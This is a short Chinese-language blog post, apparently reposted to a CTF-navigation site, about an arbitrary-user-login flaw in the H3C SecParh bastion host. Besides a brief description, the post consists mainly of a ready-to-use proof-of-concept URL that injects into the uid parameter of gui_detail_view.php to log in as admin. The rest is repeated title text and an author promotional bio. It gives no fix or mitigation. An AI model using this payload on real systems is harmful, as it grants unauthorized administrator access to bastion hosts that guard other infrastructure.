H3C SecParh堡垒机任意用户登录

渗透技巧 2年前 (2021) admin
917 0 0
 H3C SecParh堡垒机任意用户登录

点击上方蓝字

给一个关注吧



H3C SecParh堡垒机任意用户登录H3C SecParh堡垒机任意用户登录H3C SecParh堡垒机任意用户登录H3C SecParh堡垒机任意用户登录H3C SecParh堡垒机任意用户登录H3C SecParh堡垒机任意用户登录H3C SecParh堡垒机任意用户登录H3C SecParh堡垒机任意用户登录H3C SecParh堡垒机任意用户登录H3C SecParh堡垒机任意用户登录H3C SecParh堡垒机任意用户登录


  • 网络设备漏洞

漏洞描述:

H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞

与齐治堡垒机出现的漏洞相似

漏洞复现:

POC:

/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin

H3C SecParh堡垒机任意用户登录H3C SecParh堡垒机任意用户登录


H3C SecParh堡垒机任意用户登录


end






个人简介:李白华为云享专家、阿里云博客专家、CSDN网络领域优质创作者、掘金创作者BOSS有了创作者公众号【李白你好】、华为HCIE,全网粉丝3万+。我是一个爱好计算机科学,求索于逻辑思维的同时不忘哲学和浪漫主义科学,乐于分享技术与快乐的博主。博文内容涉及网络¥安全,web渗透测试、内网安全、二进制安全、工业控制安全、app、逆向等。

H3C SecParh堡垒机任意用户登录

                                                           

H3C SecParh堡垒机任意用户登录

微信:libaisec

微信交流群:加我微信拉你进群和工程师们学技术聊人生





H3C SecParh堡垒机任意用户登录



原文始发于微信公众号(李白你好):H3C SecParh堡垒机任意用户登录

版权声明:admin 发表于 2021年12月29日 上午1:59。
转载请注明:H3C SecParh堡垒机任意用户登录 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...